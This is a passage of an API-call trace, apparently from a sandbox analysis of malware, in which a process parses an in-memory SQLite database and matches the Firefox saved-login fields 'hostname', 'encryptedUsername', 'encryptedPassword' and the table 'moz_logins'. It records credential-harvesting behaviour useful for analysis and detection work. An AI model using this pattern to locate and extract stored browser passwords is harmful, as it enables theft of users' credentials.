(lpString1="encryptedPassword", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedPassword", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedPassword", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedPassword", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedPassword", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="encryptedPassword", lpString2="hostname") returned -1 [0589.420] lstrcmpiA (lpString1="encryptedPassword", lpString2="encryptedPassword") returned 0 [0589.420] lstrlenA (lpString="guid TEXT") returned 9 [0589.420] StrStrIA (lpFirst="guid TEXT", lpSrch=" ") returned=" TEXT" [0589.420] lstrlenA (lpString="guid") returned 4 [0589.420] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0589.420] lstrcmpiA (lpString1="guid", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="guid", lpString2="hostname") returned -1 [0589.421] lstrcmpiA (lpString1="guid", lpString2="encryptedPassword") returned 1 [0589.421] lstrcmpiA (lpString1="guid", lpString2="encryptedUsername") returned 1 [0589.421] lstrlenA (lpString="encType INTEGER") returned 15 [0589.421] StrStrIA (lpFirst="encType INTEGER", lpSrch=" ") returned=" INTEGER" [0589.421] lstrlenA (lpString="encType") returned 7 [0589.421] lstrcmpiA (lpString1="encType", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="hostname") returned -1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="encryptedPassword") returned 1 [0589.421] lstrcmpiA (lpString1="encType", lpString2="encryptedUsername") returned 1 [0589.421] lstrlenA (lpString="timeCreated INTEGER") returned 19 [0589.421] StrStrIA (lpFirst="timeCreated INTEGER", lpSrch=" ") returned=" INTEGER" [0589.421] lstrlenA (lpString="timeCreated") returned 11 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="hostname") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="encryptedPassword") returned 1 [0589.421] lstrcmpiA (lpString1="timeCreated", lpString2="encryptedUsername") returned 1 [0589.421] lstrlenA (lpString="timeLastUsed INTEGER") returned 20 [0589.421] StrStrIA (lpFirst="timeLastUsed INTEGER", lpSrch=" ") returned=" INTEGER" [0589.421] lstrlenA (lpString="timeLastUsed") returned 12 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="hostname") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="encryptedPassword") returned 1 [0589.421] lstrcmpiA (lpString1="timeLastUsed", lpString2="encryptedUsername") returned 1 [0589.421] lstrlenA (lpString="timePasswordChanged INTEGER") returned 27 [0589.421] StrStrIA (lpFirst="timePasswordChanged INTEGER", lpSrch=" ") returned=" INTEGER" [0589.421] lstrlenA (lpString="timePasswordChanged") returned 19 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="hostname") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="encryptedPassword") returned 1 [0589.421] lstrcmpiA (lpString1="timePasswordChanged", lpString2="encryptedUsername") returned 1 [0589.421] lstrlenA (lpString="timesUsed INTEGER)") returned 18 [0589.421] StrStrIA (lpFirst="timesUsed INTEGER)", lpSrch=" ") returned=" INTEGER)" [0589.421] lstrlenA (lpString="timesUsed") returned 9 [0589.421] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0589.421] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0589.422] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0589.422] lstrcmpiA (lpString1="timesUsed", lpString2="CONSTRAINT") returned 1 [0589.422] lstrcmpiA (lpString1="timesUsed", lpString2="hostname") returned 1 [0589.422] lstrcmpiA (lpString1="timesUsed", lpString2="encryptedPassword") returned 1 [0589.422] lstrcmpiA (lpString1="timesUsed", lpString2="encryptedUsername") returned 1 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x8000, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x8000, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52de67) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x8001, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52de66) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x8003, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52de66) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x8005, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52de66) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x8007, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52de67) returned 0x0 [0589.422] LocalAlloc (uFlags=0x40, uBytes=0x10080) returned 0x2f49758 [0589.422] LocalFree (hMem=0x2f49758) returned 0x0 [0589.422] LocalFree (hMem=0x58d840) returned 0x0 [0589.422] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.422] LocalFree (hMem=0x570078) returned 0x0 [0589.422] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.422] LocalFree (hMem=0x5a2988) returned 0x0 [0589.422] LocalFree (hMem=0x56ff38) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x7d27, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x7d27, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x7d28, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.422] IStream:LockRegion (This=0x598228, libOffset=0x7d29, cb=0x0, dwLockType=0x0) returned 0x0 [0589.422] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.422] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.422] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.423] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x598228, libOffset=0x7d2a, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.423] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.423] LocalFree (hMem=0x2f49758) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x7, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d8d8 [0589.423] LocalFree (hMem=0x57c380) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0xc, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x56ffd8) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1978 [0589.423] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x1d, cb=0x0, dwLockType=0x0) returned 0x0 [0589.423] IStream:SetSize (This=0x55e080, libNewSize=0x56ffd8) returned 0x0 [0589.423] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1a20 [0589.423] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.423] IStream:LockRegion (This=0x55e080, libOffset=0x2e, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.424] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d840 [0589.424] LocalAlloc (uFlags=0x40, uBytes=0xfa) returned 0x5500d0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:SetSize (This=0x55e080, libNewSize=0x5500d0) returned 0x0 [0589.424] LocalAlloc (uFlags=0x40, uBytes=0x102) returned 0x5d0c00 [0589.424] LocalFree (hMem=0x5500d0) returned 0x0 [0589.424] LocalFree (hMem=0x56ff38) returned 0x0 [0589.424] IUnknown:Release (This=0x55e080) returned 0x0 [0589.424] lstrcmpiA (lpString1="moz_disabledHosts", lpString2="moz_logins") returned -1 [0589.424] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.424] LocalFree (hMem=0x5d1978) returned 0x0 [0589.424] LocalFree (hMem=0x5d1a20) returned 0x0 [0589.424] LocalFree (hMem=0x58d840) returned 0x0 [0589.424] LocalFree (hMem=0x5d0c00) returned 0x0 [0589.424] LocalFree (hMem=0x570078) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x7dd3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x7dd3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x7dd4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.424] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.424] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x598228, libOffset=0x7dd5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.424] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.424] LocalFree (hMem=0x2f49758) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.424] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.424] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x570078 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.424] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x3, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x4, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x5, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x94) returned 0x56ff38 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0x57c380 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x6, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x57c380) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x8d) returned 0x58d840 [0589.425] LocalFree (hMem=0x57c380) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0xa4) returned 0x5d3958 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0xb, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x5d3958) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0xac) returned 0x2ed5118 [0589.425] LocalFree (hMem=0x5d3958) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x91) returned 0x56ffd8 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x2f, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x56ffd8) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x99) returned 0x5d1a20 [0589.425] LocalFree (hMem=0x56ffd8) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.425] IStream:LockRegion (This=0x55e080, libOffset=0x40, cb=0x0, dwLockType=0x0) returned 0x0 [0589.425] IStream:SetSize (This=0x55e080, libNewSize=0x52de87) returned 0x0 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x58d8d8 [0589.425] LocalAlloc (uFlags=0x40, uBytes=0x88) returned 0x57c380 [0589.425] LocalFree (hMem=0x570078) returned 0x0 [0589.425] IUnknown:Release (This=0x55e080) returned 0x0 [0589.426] lstrcmpiA (lpString1="moz_disabledHosts", lpString2="moz_logins") returned -1 [0589.426] LocalFree (hMem=0x58d840) returned 0x0 [0589.426] LocalFree (hMem=0x2ed5118) returned 0x0 [0589.426] LocalFree (hMem=0x5d1a20) returned 0x0 [0589.426] LocalFree (hMem=0x58d8d8) returned 0x0 [0589.426] LocalFree (hMem=0x57c380) returned 0x0 [0589.426] LocalFree (hMem=0x56ff38) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x7c75, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x7c75, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x7c76, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x7c77, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x598228, libNewSize=0x52ded3) returned 0x0 [0589.426] LocalAlloc (uFlags=0x40, uBytes=0x8080) returned 0x2f49758 [0589.426] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x52dee8 | out: ppstm=0x52dee8*=0x55e080) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x598228, libOffset=0x7c78, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x598228, libNewSize=0x2f49758) returned 0x0 [0589.426] IStream:Commit (This=0x55e080, grfCommitFlags=0x2f49758) returned 0x0 [0589.426] LocalFree (hMem=0x2f49758) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.426] LocalAlloc (uFlags=0x40, uBytes=0x98) returned 0x56ff38 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x1, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x2) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x2, cb=0x0, dwLockType=0x0) returned 0x0 [0589.426] IStream:SetSize (This=0x55e080, libNewSize=0x52de93) returned 0x0 [0589.426] IStream:LockRegion (This=0x55e080, libOffset=0x0, cb=0x0, dwLockType=0x1) 